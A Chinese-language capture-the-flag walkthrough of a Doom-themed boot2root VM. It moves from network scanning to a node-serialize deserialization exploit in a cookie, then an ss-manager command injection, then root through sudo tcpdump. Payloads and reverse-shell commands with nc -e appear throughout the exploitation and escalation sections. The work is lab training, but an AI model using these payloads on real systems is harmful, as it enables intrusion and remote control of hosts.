信息收集
1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.169.36
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.169.64 08:00:27:02:d8:37 PCS Systemtechnik GmbH
192.168.169.131 3c:55:76:dc:ab:f5 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.169.249 92:5f:a0:f7:cc:f9 (Unknown: locally administered)
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.359 seconds (108.52 hosts/sec). 3 responded
2、nmap
端口探测
┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.169.64 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-14 18:13 CST
Nmap scan report for 192.168.169.64
Host is up (0.00095s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
666/tcp open doom
MAC Address: 08:00:27:02:D8:37 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 3.70 seconds
信息探测
┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -O -A -p 22,666 192.168.169.64 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-14 18:17 CST
Nmap scan report for 192.168.169.64
Host is up (0.00031s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 95:68:04:c7:42:03:04:cd:00:4e:36:7e:cd:4f:66:ea (RSA)
| 256 c3:06:5f:7f:17:b6:cb:bc:79:6b:46:46:cc:11:3a:7d (ECDSA)
|_ 256 63:0c:28:88:25:d5:48:19:82:bb:bd:72:c6:6c:68:50 (ED25519)
666/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
MAC Address: 08:00:27:02:D8:37 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.31 ms 192.168.169.64
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.79 seconds
可以看到靶机只开启了22和666端口。
22:ssh OpenSSH 7.7
666:tcp http Node.js Express framework
666端口托管着一个node.jsexpress框架,因此666端口肯定有一个网页。
漏洞探测
┌──(root㉿ru)-[~/kali]
└─# nmap --script=vuln -p 22,666 192.168.169.64 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-14 18:20 CST
Nmap scan report for 192.168.169.64
Host is up (0.00037s latency).
PORT STATE SERVICE
22/tcp open ssh
666/tcp open doom
MAC Address: 08:00:27:02:D8:37 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 10.31 seconds
看来666页面没有漏洞!
3、nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.169.64:666
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.169.64
+ Target Hostname: 192.168.169.64
+ Target Port: 666
+ Start Time: 2023-12-14 18:22:55 (GMT8)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ /: Retrieved x-powered-by header: Express.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OPTIONS: Allowed HTTP Methods: GET, HEAD .
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8113 requests: 11 error(s) and 5 item(s) reported on remote host
+ End Time: 2023-12-14 18:23:10 (GMT8) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
4、whatweb
┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.169.64:666
WhatWeb report for http://192.168.169.64:666
Status : 200 OK
Title : <None>
IP : 192.168.169.64
Country : RESERVED, ZZ
Summary : Cookies[profile], HttpOnly[profile], X-Powered-By[Express]
Detected Plugins:
[ Cookies ]
Display the names of cookies in the HTTP headers. The
values are not returned to save on space.
String : profile
[ HttpOnly ]
If the HttpOnly flag is included in the HTTP set-cookie
response header and the browser supports it then the cookie
cannot be accessed through client side script - More Info:
http://en.wikipedia.org/wiki/HTTP_cookie
String : profile
[ X-Powered-By ]
X-Powered-By HTTP header
String : Express (from x-powered-by string)
HTTP Headers:
HTTP/1.1 200 OK
X-Powered-By: Express
Set-Cookie: profile=eyJ1c2VybmFtZSI6IkFkbWluIiwiY3NyZnRva2VuIjoidTMydDRvM3RiM2dnNDMxZnMzNGdnZGdjaGp3bnphMGw9IiwiRXhwaXJlcz0iOkZyaWRheSwgMTMgT2N0IDIwMTggMDA6MDA6MDAgR01UIn0%3D; Max-Age=900; Path=/; Expires=Thu, 14 Dec 2023 10:37:37 GMT; HttpOnly
Content-Type: text/html; charset=utf-8
Content-Length: 36
ETag: W/"24-xWt5IUP3GfGbHraPgY5EGPpcNzA"
Date: Thu, 14 Dec 2023 10:22:37 GMT
Connection: close
扫到一个怪异的cookie,先不管,我们继续往下走!
目录探测
gobuster
┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.169.64:666 --wordlist=/usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.169.64:666
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================
目录扫描啥也没有,我们深入探测一下!
WEB
666端口
访问666端口页面,发现啥也没有。源码也啥也没有!我们先抓个包看看!
burp suite
貌似是base编码,解码看看
{"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires=":Friday, 13 Oct 2018 00:00:00 GMTIn0%3D
cookie中有一个用户名和一些令牌信息
最后的 %3D url解码后是一个等于号!
当我们去刷新网页时,会有一个附加组件报错提示:
SyntaxError: Unexpected token F in JSON at position 79
at JSON.parse (<anonymous>)
at Object.exports.unserialize (/home/nodeadmin/.web/node_modules/node-serialize/lib/serialize.js:62:16)
at /home/nodeadmin/.web/server.js:12:29
at Layer.handle [as handle_request] (/home/nodeadmin/.web/node_modules/express/lib/router/layer.js:95:5)
at next (/home/nodeadmin/.web/node_modules/express/lib/router/route.js:137:13)
at Route.dispatch (/home/nodeadmin/.web/node_modules/express/lib/router/route.js:112:3)
at Layer.handle [as handle_request] (/home/nodeadmin/.web/node_modules/express/lib/router/layer.js:95:5)
at /home/nodeadmin/.web/node_modules/express/lib/router/index.js:281:22
at Function.process_params (/home/nodeadmin/.web/node_modules/express/lib/router/index.js:335:12)
at next (/home/nodeadmin/.web/node_modules/express/lib/router/index.js:275:10)
似乎少个双引号,我们加上并base64编码,再进行重发送!
好家伙,原来是引号的问题,记得把后面的 %3D 去掉,这样我们就看到返回信息了!经过测试,似乎就是返回cookie里的用户信息,我们继续测试!
我去掉了后面的多于信息,只留了username和用户名!然后编码后发包,发现和之前的一模一样!说明没有令牌这玩意也能正常工作?
经过测试,用户名可以随便改,并且都能成功回显出来!既然这样的话,漏洞不就来了吗!
最后我们得出结论,这个就是一个JSON序列化漏洞!在名字处的这个参数是可控的,我们只需要在名字处插入反弹shell即可。
json序列化
payload
{"username":"_$$ND_FUNC$$_function(){return require('child_process').execSync('whoami',(e,out,err)=>{console.log(out);}); }()"}
execSync里面的参数 ‘whoami’ 可控!可以写个反弹shell。
这段 JSON payload 包含了一个 JavaScript 函数代码。
这个函数利用了 Node.js 的特性,试图在系统上执行 whoami 命令,并将结果输出到控制台,它允许用户在系统上执行任意命令!
反弹shell
使用python获得一个交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
提权
系统信息收集
[nodeadmin@localhost home]$ uname -a
uname -a
Linux localhost.localdomain 4.16.3-301.fc28.x86_64 #1 SMP Mon Apr 23 21:59:58 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
[nodeadmin@localhost home]$ lsb_release -a
lsb_release -a
bash: lsb_release: command not found
[nodeadmin@localhost home]$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
systemd-coredump:x:999:996:systemd Core Dumper:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:998:995:User for polkitd:/:/sbin/nologin
geoclue:x:997:993:User for geoclue:/var/lib/geoclue:/sbin/nologin
colord:x:996:992:User for colord:/var/lib/colord:/sbin/nologin
rtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin
pulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gluster:x:995:989:GlusterFS daemons:/run/gluster:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
chrony:x:994:988::/var/lib/chrony:/sbin/nologin
dnsmasq:x:987:987:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
openvpn:x:986:986:OpenVPN:/etc/openvpn:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
saslauth:x:985:76:Saslauthd user:/run/saslauthd:/sbin/nologin
nm-openvpn:x:984:983:Default user for running openvpn spawned by NetworkManager:/:/sbin/nologin
nm-openconnect:x:983:982:NetworkManager user for OpenConnect:/:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
pipewire:x:982:980:PipeWire System Daemon:/var/run/pipewire:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
gnome-initial-setup:x:981:979::/run/gnome-initial-setup/:/sbin/nologin
vboxadd:x:980:1::/var/run/vboxadd:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
nginx:x:979:977:Nginx web server:/var/lib/nginx:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:976:Webalizer:/var/www/usage:/sbin/nologin
nodeadmin:x:1001:1001::/home/nodeadmin:/bin/bash
fireman:x:1002:1002::/home/fireman:/bin/bash
[nodeadmin@localhost home]$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
[nodeadmin@localhost home]$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied
[nodeadmin@localhost home]$ sudo -l
sudo -l
[sudo] password for nodeadmin: 1
Sorry, try again.
[sudo] password for nodeadmin: 2
Sorry, try again.
[sudo] password for nodeadmin: 3
sudo: 3 incorrect password attempts
[nodeadmin@localhost home]$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/sbin/userhelper
/usr/sbin/pam_timestamp_check
/usr/sbin/mtr-packet
/usr/sbin/usernetctl
/usr/sbin/exim
/usr/sbin/mount.nfs
/usr/sbin/unix_chkpwd
/usr/libexec/gstreamer-1.0/gst-ptp-helper
/usr/libexec/Xorg.wrap
/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/bin/newgidmap
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/crontab
/usr/bin/mount
/usr/bin/at
/usr/bin/su
/usr/bin/umount
/usr/bin/newuidmap
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/chage
/usr/bin/newgrp
/usr/local/lib/authbind/helper
/usr/lib/polkit-1/polkit-agent-helper-1
[nodeadmin@localhost home]$ ps aux | grep "fireman"
ps aux | grep "fireman"
root 826 0.0 0.1 301464 4576 ? S 05:12 0:00 su fireman -c /usr/local/bin/ss-manager
fireman 833 0.0 0.0 37060 3904 ? Ss 05:12 0:00 /usr/local/bin/ss-manager
nodeadm+ 1147 0.0 0.0 213788 1056 pts/0 S+ 06:45 0:00 grep --color=auto fireman
看了一堆信息,发现没啥好利用的,但是在最后我们排查了一下进程,没想到,居然暗藏玄机!
本地提权
我们发现有一个fireman用户的进程! ss-manger是shadowsocks的缩写!
Shadowsocks-libev 是一个轻量级安全的SOCKS5代理,适用于嵌入式设备和低端设备。
ss-manager 旨在控制多个用户的shadowsocks 服务器,所以它会在需要时生成新服务器。
因此,我们将通过执行 netcat 命令来使用 Shadowsocks服务
[nodeadmin@localhost home]$ netstat -anop
netstat -anop
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name Timer
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - off (0.00/0/0)
tcp 0 108 192.168.169.64:33790 192.168.169.36:1234 ESTABLISHED 1046/nc on (0.20/0/0)
tcp6 0 0 :::22 :::* LISTEN - off (0.00/0/0)
tcp6 0 0 :::666 :::* LISTEN - off (0.00/0/0)
udp 0 0 0.0.0.0:68 0.0.0.0:* - off (0.00/0/0)
udp 0 0 127.0.0.1:323 0.0.0.0:* - off (0.00/0/0)
udp 0 0 127.0.0.1:8839 0.0.0.0:* - off (0.00/0/0)
udp 23936 0 0.0.0.0:5353 0.0.0.0:* - off (0.00/0/0)
nodeadmin用户
payload
nc -u 127.0.0.1 8839
add: {"server_port":8003, "password":"test", "method":"||nc 192.168.169.36 4444 -e /bin/bash ||"}
我们尝试向本地主机(127.0.0.1)的8839端口发送UDP数据包的命令。
然后向目标主机发送一个JSON格式的数据,其中包含了一些用于配置代理服务器的信息。 server_port:8003代理端口
其中的"method"字段中注入了一个shell 命令,从指定 IP(192.168.169.36)和端口(4444)上启动一个 shell 进程。
Command Execution in ss-manager · Issue #1734 · shadowsocks/shadowsocks-libev · GitHubOverview Severity Rating: High Confirmed Affected Versions: 3.1.0 Confirmed Patched Versions: after commit c67d275 Vendor: Shadowsocks Vendor URL: https://github.com/shadowsocks/shadowsocks-libev Vector: Local Credit: X41 D-Sec GmbH, Nik...https://github.com/shadowsocks/shadowsocks-libev/issues/1734
[nodeadmin@localhost home]$ nc -u 127.0.0.1 8839
nc -u 127.0.0.1 8839
add: {"server_port":8003, "password":"test", "method":"||nc 192.168.169.36 4444 -e /bin/bash ||"}
add: {"server_port":8003, "password":"test", "method":"||nc 192.168.169.36 4444 -e /bin/bash ||"}
okok
fireman用户
┌──(root㉿ru)-[~/kali]
└─# nc -lvp 4444
listening on [any] 4444 ...
192.168.169.64: inverse host lookup failed: Unknown host
connect to [192.168.169.36] from (UNKNOWN) [192.168.169.64] 46430
id
uid=1002(fireman) gid=1002(fireman) groups=1002(fireman)
sudo -l
Matching Defaults entries for fireman on localhost:
!visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fireman may run the following commands on localhost:
(ALL) NOPASSWD: /sbin/iptables
(ALL) NOPASSWD: /usr/bin/nmcli
(ALL) NOPASSWD: /usr/sbin/tcpdump
我们成功来到fireman用户。尝试本地提权!
fireman用户存在 tcpdump,它也可用于远程代码执行。
payload
cd /tmp
echo "nc -e /bin/bash 192.168.169.36 5656" > exp
chmod +x exp
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exp -Z root
不要忘了开启本地监听。
root用户
┌──(root㉿ru)-[~/kali]
└─# nc -lvp 4444
listening on [any] 4444 ...
192.168.169.64: inverse host lookup failed: Unknown host
connect to [192.168.169.36] from (UNKNOWN) [192.168.169.64] 46440
python3 -c 'import pty;pty.spawn("/bin/bash")'
[fireman@localhost root]$ cd /tmp
cd /tmp
[fireman@localhost tmp]$ echo " nc -e /bin/bash 192.168.169.36 5656" > exp
echo " nc -e /bin/bash 192.168.169.36 5656" > exp
[fireman@localhost tmp]$ ls
ls
exp
systemd-private-23d4899d3e104ec9bf20e49609c31f4e-chronyd.service-HMP6AO
systemd-private-23d4899d3e104ec9bf20e49609c31f4e-rtkit-daemon.service-Qg7q6I
tmp.DsCsuxOpqW
[fireman@localhost tmp]$ chmod +x exp
chmod +x exp
[fireman@localhost tmp]$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exp -Z root
< -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exp -Z root
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
Maximum file limit reached: 1
1 packet captured
22 packets received by filter
0 packets dropped by kernel
[fireman@localhost tmp]$
get flag
┌──(root㉿ru)-[~/kali]
└─# nc -lvp 5656
listening on [any] 5656 ...
192.168.169.64: inverse host lookup failed: Unknown host
connect to [192.168.169.36] from (UNKNOWN) [192.168.169.64] 40660
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls -al
total 84
dr-xr-x---. 10 root root 4096 Jun 7 2018 .
dr-xr-xr-x. 18 root root 4096 May 30 2018 ..
-rw------- 1 root root 130 Jun 7 2018 .bash_history
-rw-r--r--. 1 root root 18 Feb 9 2018 .bash_logout
-rw-r--r--. 1 root root 176 Feb 9 2018 .bash_profile
-rw-r--r--. 1 root root 176 Feb 9 2018 .bashrc
drwx------. 3 root root 4096 Jun 1 2018 .cache
drwxrwx---. 4 root root 4096 May 30 2018 .config
-rw-r--r--. 1 root root 100 Feb 9 2018 .cshrc
drwx------. 3 root root 4096 May 30 2018 .dbus
-rw-------. 1 root root 16 May 30 2018 .esd_auth
-rw-r--r-- 1 root root 1993 Jun 7 2018 flag.txt
-rw-r--r-- 1 root root 12288 Jun 3 2018 .flag.txt.swp
drwxr-xr-x 4 root root 4096 Jun 3 2018 .forever
-rw------- 1 root root 1389 Jun 2 2018 .mysql_history
drwxr-xr-x. 5 1000 1000 4096 May 30 2018 .npm
drwxr-----. 3 root root 4096 May 30 2018 .pki
drwxr-xr-x 2 root root 4096 Jun 1 2018 .shadowsocks
drwx------ 2 root root 4096 Jun 7 2018 .ssh
-rw-------. 1 root root 0 May 30 2018 .Xauthority
cat flag.txt
[+] You're a soldier.
[+] One of the best that the world could set against
[+] the demonic invasion.
+-----------------------------------------------------------------------------+
| | |\ -~ / \ / |
|~~__ | \ | \/ /\ /|
| -- | \ | / \ / \ / |
| |~_| \ \___|/ \/ / |
|--__ | -- |\________________________________/~~\~~| / \ / \ |
| |~~--__ |~_|____|____|____|____|____|____|/ / \/|\ / \/ \/|
| | |~--_|__|____|____|____|____|____|_/ /| |/ \ / \ / |
|___|______|__|_||____|____|____|____|____|__[]/_|----| \/ \ / |
| \mmmm : | _|___|____|____|____|____|____|___| /\| / \ / \ |
| B :_--~~ |_|____|____|____|____|____|____| | |\/ \ / \ |
| __--P : | / / / | \ / \ /\|
|~~ | : | / ~~~ | \ / \ / |
| | |/ .-. | /\ \ / |
| | / | | |/ \ /\ |
| | / | | -_ \ / \ |
+-----------------------------------------------------------------------------+
| | /| | | 2 3 4 | /~~~~~\ | /| |_| .... ......... |
| | ~|~ | % | | | ~J~ | | ~|~ % |_| .... ......... |
| AMMO | HEALTH | 5 6 7 | \===/ | ARMOR |#| .... ......... |
+-----------------------------------------------------------------------------+
FLAG: kre0cu4jl4rzjicpo1i7z5l1
[+] Congratulations on completing this VM & I hope you enjoyed my first boot2root.
[+] You can follow me on twitter: @0katz
[+] Thanks to the homie: @Pink_P4nther
总结
首先,使用ARP-Scan和Nmap进行了网络扫描和端口探测,并获取了目标主机的基本信息,然后,使用Nikto和WhatWeb进行了网站扫描和目录探测,但没有发现任何问题。
接着,使用Burp Suite进行了HTTP请求解码和抓包,并发现了一个JSON序列化漏洞,通过对漏洞的分析,发现可以利用一个特定的参数来执行任意命令。
最后,使用Python获得了一个交互式shell,并成功提权到目标主机。整个过程包括了信息收集、漏洞探测和利用。